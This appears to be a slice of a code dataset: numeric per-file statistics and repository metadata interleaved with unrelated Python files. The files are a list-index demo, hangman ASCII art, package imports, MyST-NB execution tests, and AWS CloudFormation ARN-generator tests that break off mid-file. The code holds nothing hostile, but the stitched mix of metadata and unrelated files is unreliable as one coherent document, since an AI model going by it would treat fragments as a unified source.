| 0.620626
| 9,744
| 105,906
| 6.638034
| 0.166564
| 0.024659
| 0.007792
| 0.024675
| 0.720613
| 0.717027
| 0.701582
| 0.688347
| 0.679891
| 0.67904
| 0
| 0.527313
| 0.271259
| 105,906
| 2,344
| 148
| 45.181741
| 0.310762
| 0
| 0
| 0.774641
| 0
| 0.002871
| 0.105565
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000478
| false
| 0
| 0.000478
| 0
| 0.001435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
67cdd0bd1a3c2b29d3a2ac42180569e987be415d
| 38
|
py
|
Python
|
31/00/list.index.1.py
|
pylangstudy/201705
|
c69de524faa67fa2d96267d5a51ed9794208f0e4
|
[
"CC0-1.0"
] | null | null | null |
31/00/list.index.1.py
|
pylangstudy/201705
|
c69de524faa67fa2d96267d5a51ed9794208f0e4
|
[
"CC0-1.0"
] | 38
|
2017-05-25T07:08:48.000Z
|
2017-05-31T01:42:41.000Z
|
31/00/list.index.1.py
|
pylangstudy/201705
|
c69de524faa67fa2d96267d5a51ed9794208f0e4
|
[
"CC0-1.0"
] | null | null | null |
l = [10,20,30,40]
print(l.index(999))
| 12.666667
| 19
| 0.605263
| 9
| 38
| 2.555556
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.323529
| 0.105263
| 38
| 2
| 20
| 19
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
db2eefa4d0df81b44bc89c3270efd161c3ae8573
| 705
|
py
|
Python
|
unit 1/exc. 1.4.2.py
|
AviKalPython/self.py
|
44f8de33797a9ea28bbd1e01006920ba7c818b97
|
[
"MIT"
] | null | null | null |
unit 1/exc. 1.4.2.py
|
AviKalPython/self.py
|
44f8de33797a9ea28bbd1e01006920ba7c818b97
|
[
"MIT"
] | null | null | null |
unit 1/exc. 1.4.2.py
|
AviKalPython/self.py
|
44f8de33797a9ea28bbd1e01006920ba7c818b97
|
[
"MIT"
] | null | null | null |
# exc - 1.4.2 (rolling mission)
print("""picture 1:
x-------x""")
print("""picture 2:
x-------x
|
|
|
|
|""")
print("""picture 3:
x-------x
| |
| 0
|
|
|""")
print("""picture 4:
x-------x
| |
| 0
| |
|
|""")
print("""picture 5:
x-------x
| |
| 0
| /|\\
|
|""")
print("""picture 6:
x-------x
| |
| 0
| /|\\
| /
|""")
print("""picture 7:
x-------x
| |
| 0
| /|\\
| / \\
|""")
| 13.823529
| 32
| 0.184397
| 46
| 705
| 2.826087
| 0.304348
| 0.646154
| 0.115385
| 0.246154
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.574468
| 705
| 51
| 33
| 13.823529
| 0.383333
| 0.041135
| 0
| 0.590909
| 0
| 0
| 0.832
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.159091
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
db310a5bf54963035922f9611f57e44e6f7b99a7
| 26
|
py
|
Python
|
sns/api/reddit/__init__.py
|
kylepw/panner
|
482ef8e8c1e8d9464d7dc8e4df5b5d9b58e83d35
|
[
"MIT"
] | 2
|
2019-07-20T01:48:20.000Z
|
2019-11-15T06:50:54.000Z
|
sns/api/reddit/__init__.py
|
kylepw/panner
|
482ef8e8c1e8d9464d7dc8e4df5b5d9b58e83d35
|
[
"MIT"
] | 5
|
2020-02-12T08:58:06.000Z
|
2021-09-22T17:56:42.000Z
|
sns/api/reddit/__init__.py
|
kylepw/panner
|
482ef8e8c1e8d9464d7dc8e4df5b5d9b58e83d35
|
[
"MIT"
] | null | null | null |
from .reddit import Reddit
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
db3316baf71d34a1cb773146b81d366869ab014f
| 90
|
py
|
Python
|
backend/src/awattprice_notifications/__init__.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | 2
|
2020-09-06T18:17:20.000Z
|
2020-09-06T19:06:19.000Z
|
backend/src/awattprice_notifications/__init__.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | null | null | null |
backend/src/awattprice_notifications/__init__.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | null | null | null |
from . import apns
from . import defaults
from . import notifications
from . import utils
| 18
| 27
| 0.777778
| 12
| 90
| 5.833333
| 0.5
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 90
| 4
| 28
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e1db307b91a109a22cd725f8ec733b37f921e6f6
| 7,074
|
py
|
Python
|
tests/test_execute.py
|
tonyfast/MyST-NB
|
5ba41a2f29982db076d9e87fe41391f36057f2f8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_execute.py
|
tonyfast/MyST-NB
|
5ba41a2f29982db076d9e87fe41391f36057f2f8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_execute.py
|
tonyfast/MyST-NB
|
5ba41a2f29982db076d9e87fe41391f36057f2f8
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_basic_unrun(sphinx_run, file_regression, check_nbs):
"""The outputs should be populated."""
sphinx_run.build()
assert sphinx_run.warnings() == ""
assert "test_name" in sphinx_run.app.env.metadata["basic_unrun"]
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_rebuild_cache(sphinx_run):
"""The notebook should only be executed once."""
sphinx_run.build()
assert "Executing" in sphinx_run.status(), sphinx_run.status()
sphinx_run.invalidate_files()
sphinx_run.build()
assert "Executing" not in sphinx_run.status(), sphinx_run.status()
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "force"}
)
def test_rebuild_force(sphinx_run):
"""The notebook should be executed twice."""
sphinx_run.build()
assert "Executing" in sphinx_run.status(), sphinx_run.status()
sphinx_run.invalidate_files()
sphinx_run.build()
assert "Executing" in sphinx_run.status(), sphinx_run.status()
@pytest.mark.sphinx_params(
"basic_unrun.ipynb",
conf={
"jupyter_execute_notebooks": "cache",
"execution_excludepatterns": ["basic_*"],
},
)
def test_exclude_path(sphinx_run, file_regression):
"""The notebook should not be executed."""
sphinx_run.build()
assert len(sphinx_run.app.env.excluded_nb_exec_paths) == 1
assert "Executing" not in sphinx_run.status(), sphinx_run.status()
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
"basic_failing.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_basic_failing(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
# print(sphinx_run.status())
assert "Execution Failed" in sphinx_run.warnings()
assert (
"Couldn't find cache key for notebook file source/basic_failing.ipynb"
in sphinx_run.warnings()
)
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
sphinx_run.get_report_file()
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "auto"}
)
def test_basic_unrun_nbclient(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
# print(sphinx_run.status())
assert sphinx_run.warnings() == ""
assert "test_name" in sphinx_run.app.env.metadata["basic_unrun"]
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "force"}
)
def test_outputs_present(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
# print(sphinx_run.status())
assert sphinx_run.warnings() == ""
assert "test_name" in sphinx_run.app.env.metadata["basic_unrun"]
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
"complex_outputs_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_complex_outputs_unrun(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
# print(sphinx_run.status())
assert sphinx_run.warnings() == ""
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
# Widget view and widget state should make it into the HTML
html = sphinx_run.get_html()
assert '<script type="application/vnd.jupyter.widget-view+json">' in html
assert '<script type="application/vnd.jupyter.widget-state+json">' in html
@pytest.mark.sphinx_params(
"complex_outputs_unrun.ipynb", conf={"jupyter_execute_notebooks": "auto"}
)
def test_complex_outputs_unrun_nbclient(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
# print(sphinx_run.status())
assert sphinx_run.warnings() == ""
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
# Widget view and widget state should make it into the HTML
html = sphinx_run.get_html()
assert '<script type="application/vnd.jupyter.widget-view+json">' in html
assert '<script type="application/vnd.jupyter.widget-state+json">' in html
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "off"}
)
def test_no_execute(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
# print(sphinx_run.status())
assert sphinx_run.warnings() == ""
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
@pytest.mark.sphinx_params(
"basic_unrun.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_jupyter_cache_path(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
assert "Execution Succeeded" in sphinx_run.status()
assert sphinx_run.warnings() == ""
file_regression.check(sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb")
file_regression.check(sphinx_run.get_doctree().pformat(), extension=".xml")
# Testing relative paths within the notebook
@pytest.mark.sphinx_params(
"basic_relative.ipynb", conf={"jupyter_execute_notebooks": "cache"}
)
def test_relative_path_cache(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
assert "Executing" in sphinx_run.status(), sphinx_run.status()
@pytest.mark.sphinx_params(
"basic_relative.ipynb", conf={"jupyter_execute_notebooks": "force"}
)
def test_relative_path_force(sphinx_run, file_regression, check_nbs):
sphinx_run.build()
assert "Executing" in sphinx_run.status(), sphinx_run.status()
# Execution timeout configuration
@pytest.mark.sphinx_params(
"complex_outputs_unrun.ipynb",
conf={"jupyter_execute_notebooks": "cache", "execution_timeout": 1},
)
def test_execution_timeout(sphinx_run, file_regression, check_nbs):
""" execution should fail given the low timeout value"""
sphinx_run.build()
assert "execution failed" in sphinx_run.warnings()
@pytest.mark.sphinx_params(
"complex_outputs_unrun_timeout.ipynb",
conf={"jupyter_execute_notebooks": "cache", "execution_timeout": 60},
)
def test_execution_metadata_timeout(sphinx_run, file_regression, check_nbs):
""" notebook timeout metadata has higher preference then execution_timeout config"""
sphinx_run.build()
assert "execution failed" in sphinx_run.warnings()
| 38.237838
| 88
| 0.739327
| 935
| 7,074
| 5.284492
| 0.113369
| 0.163934
| 0.111516
| 0.086015
| 0.867638
| 0.843352
| 0.843352
| 0.804493
| 0.783849
| 0.767051
| 0
| 0.000647
| 0.126661
| 7,074
| 184
| 89
| 38.445652
| 0.799126
| 0.089483
| 0
| 0.595588
| 0
| 0
| 0.217378
| 0.115018
| 0
| 0
| 0
| 0
| 0.198529
| 1
| 0.110294
| false
| 0
| 0.007353
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c027d718d2391c4d5604b5403c5798b0572b39f8
| 64
|
py
|
Python
|
stream/server_sent_event.py
|
project-nait/simple-stream
|
0fb4a031442b30cd8d0e10ebf78756cdd06f535b
|
[
"MIT"
] | null | null | null |
stream/server_sent_event.py
|
project-nait/simple-stream
|
0fb4a031442b30cd8d0e10ebf78756cdd06f535b
|
[
"MIT"
] | null | null | null |
stream/server_sent_event.py
|
project-nait/simple-stream
|
0fb4a031442b30cd8d0e10ebf78756cdd06f535b
|
[
"MIT"
] | null | null | null |
class ServerSentEvent(object):
def __init__():
pass
| 16
| 30
| 0.640625
| 6
| 64
| 6.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265625
| 64
| 3
| 31
| 21.333333
| 0.787234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
c0383fb798279946dc5e1f0aa34294a736c41bee
| 25,505
|
py
|
Python
|
cfn_policy_validator/tests/parsers_tests/utils_tests/test_arn_generator.py
|
awslabs/aws-cloudformation-iam-policy-validator
|
52c1439e4d76d2c7d45c97563cc87f8458134e0b
|
[
"MIT-0"
] | 41
|
2021-09-30T01:28:51.000Z
|
2022-03-24T09:42:09.000Z
|
cfn_policy_validator/tests/parsers_tests/utils_tests/test_arn_generator.py
|
awslabs/aws-cloudformation-iam-policy-validator
|
52c1439e4d76d2c7d45c97563cc87f8458134e0b
|
[
"MIT-0"
] | 10
|
2021-09-30T08:13:11.000Z
|
2022-03-22T07:34:41.000Z
|
cfn_policy_validator/tests/parsers_tests/utils_tests/test_arn_generator.py
|
awslabs/aws-cloudformation-iam-policy-validator
|
52c1439e4d76d2c7d45c97563cc87f8458134e0b
|
[
"MIT-0"
] | 3
|
2021-11-29T21:13:30.000Z
|
2022-02-04T12:49:40.000Z
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import unittest
from cfn_policy_validator.application_error import ApplicationError
from cfn_policy_validator.parsers.utils.arn_generator import ArnGenerator
from cfn_policy_validator.tests.parsers_tests import mock_node_evaluator_setup
from cfn_policy_validator.tests.utils import account_config, load, load_resources, required_property_error, \
expected_type_error
def build_resource(resource):
template = load({
'Resources': {
'ResourceA': resource
}
})
return template['Resources']['ResourceA']
class WhenGeneratingAnArnForAKnownResource(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_generates_arn_from_ref(self):
resource = build_resource({'Type': 'AWS::AccessAnalyzer::Analyzer'})
arn = self.arn_generator.try_generate_arn("MyAnalyzer", resource, "Ref")
self.assertEqual(f"arn:aws:access-analyzer:{account_config.region}:{account_config.account_id}:analyzer/MyAnalyzer", arn)
@mock_node_evaluator_setup()
def test_generates_arn_from_attribute(self):
resource = build_resource({'Type': "AWS::ECS::Cluster"})
arn = self.arn_generator.try_generate_arn("MyTestCluster", resource, "Arn")
self.assertEqual(f"arn:aws:ecs:{account_config.region}:{account_config.account_id}:cluster/MyTestCluster", arn)
class WhenGeneratingAnArnForAnUnknownResource(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_does_not_generate_arn(self):
resource = build_resource({'Type': "AWS::EC2::Instance"})
arn = self.arn_generator.try_generate_arn("AnyName", resource, "Ref")
self.assertIsNone(arn)
class WhenGeneratingAnArnAndValidatingSchema(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_with_invalid_resource_type(self):
resource = build_resource({'Type': 'AWS::Instance'})
with self.assertRaises(ApplicationError) as cm:
self.arn_generator.try_generate_arn('AnyName', resource, 'Ref')
self.assertEqual('Invalid resource type: AWS::Instance', str(cm.exception))
class WhenGeneratingAnArnForACloudFormationModule(unittest.TestCase):
@mock_node_evaluator_setup()
def test_should_raise_error(self):
arn_generator = ArnGenerator(account_config)
resource = build_resource({'Type': 'Org::ServiceName::UseCase::MODULE'})
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('AnyName', resource, 'Ref')
self.assertEqual('Unable to resolve Org::ServiceName::UseCase::MODULE. CloudFormation modules are not yet supported.', str(cm.exception))
class WhenGeneratingAnArnForAnIAMRoleAndValidatingSchema(unittest.TestCase):
@mock_node_evaluator_setup()
def test_with_no_properties(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::Role'
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('MyRole', template['Resources']['ResourceA'], 'Arn')
self.assertEqual(required_property_error('Properties', 'ResourceA'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_path_type(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::Role',
'Properties': {
'Path': []
}
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('MyRole', template['Resources']['ResourceA'], 'Arn')
self.assertEqual(expected_type_error('ResourceA.Properties.Path', 'string', '[]'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_role_name_type(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::Role',
'Properties': {
'RoleName': []
}
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('MyRole', template['Resources']['ResourceA'], 'Arn')
self.assertEqual(expected_type_error('ResourceA.Properties.RoleName', 'string', '[]'), str(cm.exception))
class WhenGeneratingAnArnForAnIAMRole(unittest.TestCase):
@staticmethod
def add_resource_to_template(resource):
template = load({
'Parameters': {
'MyRoleParameter': {'Type': 'string'},
'MyPathParameter': {'Type': 'string'}
},
'Resources': {
'InvalidRoleReference': {
'Type': 'AWS::IAM::Role',
'Properties': {
'RoleName': {'NotA': 'String'},
'Path': ['NotA', 'String']
}
},
'ResourceA': resource
}
},
{
'MyRoleParameter': 'MyCustomRoleName',
'MyPathParameter': '/my/custom/path/'
})
return template['Resources']['ResourceA']
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_generates_arn_with_path_and_name(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::Role',
'Properties': {
'Path': {'Ref': 'MyPathParameter'},
'RoleName': {'Ref': 'MyRoleParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyRole", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:role/my/custom/path/MyCustomRoleName", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_path_and_resource_name_if_no_name(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::Role',
'Properties': {
'Path': {'Ref': 'MyPathParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyRole", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:role/my/custom/path/MyRole", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_default_path_and_name_if_no_path(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::Role',
'Properties': {
'RoleName': {'Ref': 'MyRoleParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyRole", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:role/MyCustomRoleName", arn)
class WhenGeneratingAnArnForAnIAMUserAndValidatingSchema(unittest.TestCase):
@mock_node_evaluator_setup()
def test_with_invalid_path_type(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::User',
'Properties': {
'Path': []
}
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('MyUser', template['Resources']['ResourceA'], 'Arn')
self.assertEqual(expected_type_error('ResourceA.Properties.Path', 'string', '[]'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_user_name_type(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::User',
'Properties': {
'UserName': []
}
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('MyUser', template['Resources']['ResourceA'], 'Arn')
self.assertEqual(expected_type_error('ResourceA.Properties.UserName', 'string', '[]'), str(cm.exception))
class WhenGeneratingAnArnForAnIAMUser(unittest.TestCase):
@staticmethod
def add_resource_to_template(resource):
template = load({
'Parameters': {
'MyUserParameter': {'Type': 'string'},
'MyPathParameter': {'Type': 'string'}
},
'Resources': {
'ResourceA': resource
}
},
{
'MyUserParameter': 'MyCustomUserName',
'MyPathParameter': '/my/custom/user/path/'
})
return template['Resources']['ResourceA']
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_generates_arn_with_path_and_name(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::User',
'Properties': {
'Path': {'Ref': 'MyPathParameter'},
'UserName': {'Ref': 'MyUserParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/my/custom/user/path/MyCustomUserName", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_path_and_resource_name_if_no_name(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::User',
'Properties': {
'Path': {'Ref': 'MyPathParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/my/custom/user/path/MyUser", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_default_path_and_name_if_no_path(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::User',
'Properties': {
'UserName': {'Ref': 'MyUserParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/MyCustomUserName", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_all_defaults_if_no_properties(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::User'
})
arn = self.arn_generator.try_generate_arn("MyUser", resource, "Arn")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:user/MyUser", arn)
class WhenGeneratingAnArnForAnIAMManagedPolicyAndValidatingSchema(unittest.TestCase):
@mock_node_evaluator_setup()
def test_with_no_properties(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::ManagedPolicy'
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('MyPolicy', template['Resources']['ResourceA'], 'Ref')
self.assertEqual(required_property_error('Properties', 'ResourceA'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_path_type(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::ManagedPolicy',
'Properties': {
'Path': []
}
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('ResourceA', template['Resources']['ResourceA'], 'Ref')
self.assertEqual(expected_type_error('ResourceA.Properties.Path', 'string', '[]'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_managed_policy_name_type(self):
template = load_resources({
'ResourceA': {
'Type': 'AWS::IAM::ManagedPolicy',
'Properties': {
'ManagedPolicyName': []
}
}
})
arn_generator = ArnGenerator(account_config)
with self.assertRaises(ApplicationError) as cm:
arn_generator.try_generate_arn('ResourceA', template['Resources']['ResourceA'], 'Ref')
self.assertEqual(expected_type_error('ResourceA.Properties.ManagedPolicyName', 'string', '[]'), str(cm.exception))
class WhenGeneratingAnArnForAnIAMUser(unittest.TestCase):
@staticmethod
def add_resource_to_template(resource):
template = load({
'Parameters': {
'MyManagedPolicyParameter': {'Type': 'string'},
'MyPathParameter': {'Type': 'string'}
},
'Resources': {
'ResourceA': resource
}
},
{
'MyManagedPolicyParameter': 'MyCustomManagedPolicyName',
'MyPathParameter': '/my/custom/policy/path/'
})
return template['Resources']['ResourceA']
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_generates_arn_with_path_and_name(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::ManagedPolicy',
'Properties': {
'Path': {'Ref': 'MyPathParameter'},
'ManagedPolicyName': {'Ref': 'MyManagedPolicyParameter'}
}
})
arn = self.arn_generator.try_generate_arn("MyPolicy", resource, "Ref")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:policy/my/custom/policy/path/MyCustomManagedPolicyName", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_path_and_resource_name_if_no_name(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::ManagedPolicy',
'Properties': {
'Path': {'Ref': 'MyPathParameter'}
}
})
arn = self.arn_generator.try_generate_arn("ResourceA", resource, "Ref")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:policy/my/custom/policy/path/ResourceA", arn)
@mock_node_evaluator_setup()
def test_generates_arn_with_default_path_and_name_if_no_path(self):
resource = self.add_resource_to_template({
'Type': 'AWS::IAM::ManagedPolicy',
'Properties': {
'ManagedPolicyName': {'Ref': 'MyManagedPolicyParameter'}
}
})
arn = self.arn_generator.try_generate_arn("ResourceA", resource, "Ref")
self.assertEqual(f"arn:aws:iam::{account_config.account_id}:policy/MyCustomManagedPolicyName", arn)
class WhenGeneratingAnArnForELBv2ResourcesAndValidatingSchema(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_with_invalid_load_balancer_type_type(self):
resource = build_resource({
'Type': 'AWS::ElasticLoadBalancingV2::LoadBalancer',
'Properties': {
'Type': []
}
})
with self.assertRaises(ApplicationError) as cm:
self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
self.assertEqual(expected_type_error('ResourceA.Properties.Type', 'string', '[]'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_load_balancer_listener_protocol_type(self):
resource = build_resource({
'Type': 'AWS::ElasticLoadBalancingV2::Listener',
'Properties': {
'Protocol': []
}
})
with self.assertRaises(ApplicationError) as cm:
self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
self.assertEqual(expected_type_error('ResourceA.Properties.Protocol', 'string', '[]'), str(cm.exception))
@mock_node_evaluator_setup()
def test_with_invalid_load_balancer_target_group_protocol_type(self):
resource = build_resource({
'Type': 'AWS::ElasticLoadBalancingV2::TargetGroup',
'Properties': {
'Protocol': []
}
})
with self.assertRaises(ApplicationError) as cm:
self.arn_generator.try_generate_arn('MyLB', resource, 'Ref')
self.assertEqual(expected_type_error('ResourceA.Properties.Protocol', 'string', '[]'), str(cm.exception))
# ELBv2 resources have a specific generation pattern that depends on if the ELB is an ALB or an NLB
class WhenGeneratingAnArnForELBv2Resources(unittest.TestCase):
def setUp(self):
self.arn_generator = ArnGenerator(account_config)
@mock_node_evaluator_setup()
def test_does_not_generate_arn_for_alb_attributes(self):
resource = build_resource({'Type': "AWS::ElasticLoadBalancingV2::LoadBalancer"})
